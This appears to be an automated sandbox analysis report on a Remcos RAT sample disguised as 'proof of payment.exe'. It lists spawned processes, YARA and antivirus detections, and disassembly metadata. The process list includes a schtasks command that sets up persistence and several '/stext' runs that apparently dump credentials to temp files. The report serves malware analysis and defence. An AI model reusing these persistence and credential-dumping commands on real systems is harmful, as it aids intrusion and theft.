                                    Path:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    Imagebase:0x1f0000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 61%, ReversingLabs
                                    • Detection: 56%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:13:13:19
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff72d8c0000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:13:13:23
                                    Start date:03/05/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"
                                    Imagebase:0x460000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:13:13:23
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:13:13:23
                                    Start date:03/05/2024
                                    Path:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                                    Imagebase:0x680000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"
                                    Imagebase:0x750000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                                    Imagebase:0x150000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                                    Imagebase:0xcc0000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                                    Imagebase:0x190000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                                    Imagebase:0x100000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                                    Imagebase:0x950000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:7.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:46
                                      Total number of Limit Nodes:4
                                      execution_graph 14495 d5d421 14496 d5d3e4 DuplicateHandle 14495->14496 14498 d5d42a 14495->14498 14497 d5d3f6 14496->14497 14499 d54668 14500 d5467a 14499->14500 14501 d54686 14500->14501 14503 d54779 14500->14503 14504 d5479d 14503->14504 14508 d54888 14504->14508 14512 d54878 14504->14512 14510 d548af 14508->14510 14509 d5498c 14509->14509 14510->14509 14516 d5449c 14510->14516 14514 d548af 14512->14514 14513 d5498c 14514->14513 14515 d5449c CreateActCtxA 14514->14515 14515->14513 14517 d55918 CreateActCtxA 14516->14517 14519 d559db 14517->14519 14520 d5ad98 14523 d5ae90 14520->14523 14521 d5ada7 14524 d5aea1 14523->14524 14525 d5aec4 14523->14525 14524->14525 14531 d5b118 14524->14531 14535 d5b128 14524->14535 14525->14521 14526 d5aebc 14526->14525 14527 d5b0c8 GetModuleHandleW 14526->14527 14528 d5b0f5 14527->14528 14528->14521 14532 d5b13c 14531->14532 14534 d5b161 14532->14534 14539 d5a8d0 14532->14539 14534->14526 14536 d5b13c 14535->14536 14537 d5a8d0 LoadLibraryExW 14536->14537 14538 d5b161 14536->14538 14537->14538 14538->14526 14541 d5b308 LoadLibraryExW 14539->14541 14542 d5b381 14541->14542 14542->14534 14543 d5d118 14544 d5d15e GetCurrentProcess 14543->14544 14546 d5d1b0 GetCurrentThread 14544->14546 14547 d5d1a9 14544->14547 14548 d5d1e6 14546->14548 14549 d5d1ed GetCurrentProcess 14546->14549 14547->14546 14548->14549 14552 d5d223 14549->14552 14550 d5d24b GetCurrentThreadId 14551 d5d27c 14550->14551 14552->14550

                                      Executed Functions

                                      Function 00D5D109 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D196
                                      • GetCurrentThread.KERNEL32 ref: 00D5D1D3
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D210
                                      • GetCurrentThreadId.KERNEL32 ref: 00D5D269
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: ac80616a860e8f19c47b72621d578631812a9fac939993270066161118062385
                                      • Instruction ID: ef1b463ba89c1aac6323875e5a784905aa9bb9ddae6d1a63b8406856b2155320
                                      • Opcode Fuzzy Hash: ac80616a860e8f19c47b72621d578631812a9fac939993270066161118062385
                                      • Instruction Fuzzy Hash: FF5169B09017098FEB54DFA9D548BAEBBF1EF48304F248069E849A7390CB749948CB75
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5D118 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D196
                                      • GetCurrentThread.KERNEL32 ref: 00D5D1D3
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D210
                                      • GetCurrentThreadId.KERNEL32 ref: 00D5D269
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 4418647bc4ba64eba575b1be3f0632bb192a17e93280d392a650ed616bdce995
                                      • Instruction ID: 74947e1f703de95cad166e4c6094efdd67c80ef1f60b9903085a5abee7a6e657
                                      • Opcode Fuzzy Hash: 4418647bc4ba64eba575b1be3f0632bb192a17e93280d392a650ed616bdce995
                                      • Instruction Fuzzy Hash: A15168B09017098FEB54DFA9D548BAEBBF1EF48304F248069E849A7350DB74A944CB75
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5AE90 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 45 d5ae90-d5ae9f 46 d5aea1-d5aeae call d59898 45->46 47 d5aecb-d5aecf 45->47 54 d5aec4 46->54 55 d5aeb0 46->55 49 d5aed1-d5aedb 47->49 50 d5aee3-d5af24 47->50 49->50 56 d5af26-d5af2e 50->56 57 d5af31-d5af3f 50->57 54->47 100 d5aeb6 call d5b118 55->100 101 d5aeb6 call d5b128 55->101 56->57 58 d5af41-d5af46 57->58 59 d5af63-d5af65 57->59 61 d5af51 58->61 62 d5af48-d5af4f call d5a874 58->62 64 d5af68-d5af6f 59->64 60 d5aebc-d5aebe 60->54 63 d5b000-d5b0c0 60->63 66 d5af53-d5af61 61->66 62->66 95 d5b0c2-d5b0c5 63->95 96 d5b0c8-d5b0f3 GetModuleHandleW 63->96 67 d5af71-d5af79 64->67 68 d5af7c-d5af83 64->68 66->64 67->68 69 d5af85-d5af8d 68->69 70 d5af90-d5af92 call d5a884 68->70 69->70 74 d5af97-d5af99 70->74 76 d5afa6-d5afab 74->76 77 d5af9b-d5afa3 74->77 78 d5afad-d5afb4 76->78 79 d5afc9-d5afd6 76->79 77->76 78->79 81 d5afb6-d5afc6 call d5a894 call d5a8a4 78->81 85 d5aff9-d5afff 79->85 86 d5afd8-d5aff6 79->86 81->79 86->85 95->96 97 d5b0f5-d5b0fb 96->97 98 d5b0fc-d5b110 96->98 97->98 100->60 101->60
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D5B0E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 7a1e852a180552db2e9f390f37e224e1c3409adfc3e45a68c69d5aa69dc6615f
                                      • Instruction ID: e845ceb80d72adee4271756afb2c464b600fcc24de1e36e7af9eaafdd78fb54d
                                      • Opcode Fuzzy Hash: 7a1e852a180552db2e9f390f37e224e1c3409adfc3e45a68c69d5aa69dc6615f
                                      • Instruction Fuzzy Hash: A97137B0A00B158FDB24DF69D05175ABBF1FF88311F048A2DE886D7A50DB75E849CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 102 d5449c-d559d9 CreateActCtxA 105 d559e2-d55a3c 102->105 106 d559db-d559e1 102->106 113 d55a3e-d55a41 105->113 114 d55a4b-d55a4f 105->114 106->105 113->114 115 d55a51-d55a5d 114->115 116 d55a60 114->116 115->116 118 d55a61 116->118 118->118
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00D559C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 93cec17b4ea8e680309e10b7bc2dbe02393037103adfbc803c3f962af967f756
                                      • Instruction ID: 1a21345b5e11ad9f5f143721d4c699986dbf379aff646b0284bd68a64677b317
                                      • Opcode Fuzzy Hash: 93cec17b4ea8e680309e10b7bc2dbe02393037103adfbc803c3f962af967f756
                                      • Instruction Fuzzy Hash: 8041D2B0C00719CBDF24DFA9C844B9EBBF5BF48304F24856AD818AB255DB756949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 119 d5590c-d55913 120 d5591c-d559d9 CreateActCtxA 119->120 122 d559e2-d55a3c 120->122 123 d559db-d559e1 120->123 130 d55a3e-d55a41 122->130 131 d55a4b-d55a4f 122->131 123->122 130->131 132 d55a51-d55a5d 131->132 133 d55a60 131->133 132->133 135 d55a61 133->135 135->135
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00D559C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 26816cbd3193f2dae232e67bcc253d6520995b6359ad5b5ef164eb83bb508605
                                      • Instruction ID: 6bf494fb5946447ba45818312d4bd74e5244ee59cf185aa9bc172861e73032db
                                      • Opcode Fuzzy Hash: 26816cbd3193f2dae232e67bcc253d6520995b6359ad5b5ef164eb83bb508605
                                      • Instruction Fuzzy Hash: 1F41DFB1C00719CBDF24DFA9D884B8DBBF1BF48304F24856AD818AB255DB75694ACF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5D421 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 136 d5d421-d5d428 137 d5d3e4-d5d3f4 DuplicateHandle 136->137 138 d5d42a-d5d54e 136->138 139 d5d3f6-d5d3fc 137->139 140 d5d3fd-d5d41a 137->140 139->140
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D5D3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 8b20dcd85321f88388560c4a330addd33b8d26953280d878271d123231737503
                                      • Instruction ID: b02a0166e3cef53ab50e30ddeb64239d70d7cdd817e8e78fb37a3f448b80d7ff
                                      • Opcode Fuzzy Hash: 8b20dcd85321f88388560c4a330addd33b8d26953280d878271d123231737503
                                      • Instruction Fuzzy Hash: 3E318C746503808FEB00DF64E8547693BA6F7C8760F10842AE9119B3EACBF88C45CB71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5D358 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 154 d5d358-d5d3f4 DuplicateHandle 155 d5d3f6-d5d3fc 154->155 156 d5d3fd-d5d41a 154->156 155->156
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D5D3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 69621bee522510ad04a1c0ac18a54dd1f653190cb82d103504b0e5d30aee0a27
                                      • Instruction ID: a8646a772ec405039b660ba59f316cd2600ef93e55336687d4266b5e84c71762
                                      • Opcode Fuzzy Hash: 69621bee522510ad04a1c0ac18a54dd1f653190cb82d103504b0e5d30aee0a27
                                      • Instruction Fuzzy Hash: B821E2B5D00209DFDB10CFAAD584AEEBBF5EB48310F14842AE958B7350C378A954CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5D360 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 159 d5d360-d5d3f4 DuplicateHandle 160 d5d3f6-d5d3fc 159->160 161 d5d3fd-d5d41a 159->161 160->161
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D5D3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: fc6ca9cc0a40f847b03039bbb4331fe8be70007da766b3896faccdc0a58b2a88
                                      • Instruction ID: 1163525110baafd5bc25f79b7583299ebbd037c3cd9c01140cf60e981ab6a254
                                      • Opcode Fuzzy Hash: fc6ca9cc0a40f847b03039bbb4331fe8be70007da766b3896faccdc0a58b2a88
                                      • Instruction Fuzzy Hash: AF21E4B5D00209DFDB10CFAAD484ADEFBF5EB48310F14842AE954A7350D374A954CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5A8D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 164 d5a8d0-d5b348 166 d5b350-d5b37f LoadLibraryExW 164->166 167 d5b34a-d5b34d 164->167 168 d5b381-d5b387 166->168 169 d5b388-d5b3a5 166->169 167->166 168->169
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00D5B161,00000800,00000000,00000000), ref: 00D5B372
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 88afb1f3dd864649eb26aad93069e943acbef9e7f3b2562e82249fd4534e6843
                                      • Instruction ID: 6ce318fb456b5ef957aa7f29a8f16bfea2f83d72058a41d5fe1fbed2106454ed
                                      • Opcode Fuzzy Hash: 88afb1f3dd864649eb26aad93069e943acbef9e7f3b2562e82249fd4534e6843
                                      • Instruction Fuzzy Hash: 441103B68003489FDF10CF9AD444AAEFBF4EB48320F14842AE859B7200C375A949CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5B300 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 172 d5b300-d5b348 173 d5b350-d5b37f LoadLibraryExW 172->173 174 d5b34a-d5b34d 172->174 175 d5b381-d5b387 173->175 176 d5b388-d5b3a5 173->176 174->173 175->176
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00D5B161,00000800,00000000,00000000), ref: 00D5B372
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 94ae760d5c6249aa2d187ea1db27d86bc2495bf0cf4911ee6ab862e79c4c03a4
                                      • Instruction ID: 409119f494298ac3d24147ad50053ee9c7c32747484fce9628c5931df7ba153c
                                      • Opcode Fuzzy Hash: 94ae760d5c6249aa2d187ea1db27d86bc2495bf0cf4911ee6ab862e79c4c03a4
                                      • Instruction Fuzzy Hash: 371114B6D002498FDF14CFAAD444AEEFBF4EB48310F14846AD859A7600C375A549CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00D5B080 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 179 d5b080-d5b0c0 180 d5b0c2-d5b0c5 179->180 181 d5b0c8-d5b0f3 GetModuleHandleW 179->181 180->181 182 d5b0f5-d5b0fb 181->182 183 d5b0fc-d5b110 181->183 182->183
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D5B0E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: a419978a0d8ae25a537677bf65f21330184b235c365556ab8f73cb6aa6884a7f
                                      • Instruction ID: 395dd3329c69f8287f8293e1c282e5e6ffa408c7f5f1c2d1d872aa4abd15c970
                                      • Opcode Fuzzy Hash: a419978a0d8ae25a537677bf65f21330184b235c365556ab8f73cb6aa6884a7f
                                      • Instruction Fuzzy Hash: 3F11DFB5C007498FDB20DF9AD444BEEFBF4AF89320F14842AD869A7250C375A549CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008AD4C4 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bea25e7601e0c727ddcd1561f2dfaac0ac250d7581400545940d26d7dffcbe5
                                      • Instruction ID: 2267db44154cc0d73fcd517c245aba966cdfdedcdc0e996fd3a6a2a8b824d6e9
                                      • Opcode Fuzzy Hash: 4bea25e7601e0c727ddcd1561f2dfaac0ac250d7581400545940d26d7dffcbe5
                                      • Instruction Fuzzy Hash: 4C2137B1904344DFEB05DF10D9C0B26BF65FB89318F24C569E80ACBA56C336D856CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008AD3D8 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: feb5fbeb7bb8dc5869080c84851c5b24aa84538be3f95ab40deb33862804f703
                                      • Instruction ID: 3e093b9f5c3357d77764a93893a2625e321464a65694e219770eb90cf9481df0
                                      • Opcode Fuzzy Hash: feb5fbeb7bb8dc5869080c84851c5b24aa84538be3f95ab40deb33862804f703
                                      • Instruction Fuzzy Hash: 25210671504304DFEB04DF10D9C0B16BB65FB99314F20C169D80A8BA56C33AE856CAA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008BD01C Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ddcc6932fba6d5312b73296a1dfee6ef8891c93e34a41932bfb2889cf72a8df5
                                      • Instruction ID: abf1dd1f49cc6cf8d1b718e1edbc406eb520bcdcf9398ce52a2da771c9112870
                                      • Opcode Fuzzy Hash: ddcc6932fba6d5312b73296a1dfee6ef8891c93e34a41932bfb2889cf72a8df5
                                      • Instruction Fuzzy Hash: 8D213471604B04EFDB14EF10D8C0B66BB61FB88318F20C56DD80A8B382D33AD847CA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008BD1D4 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
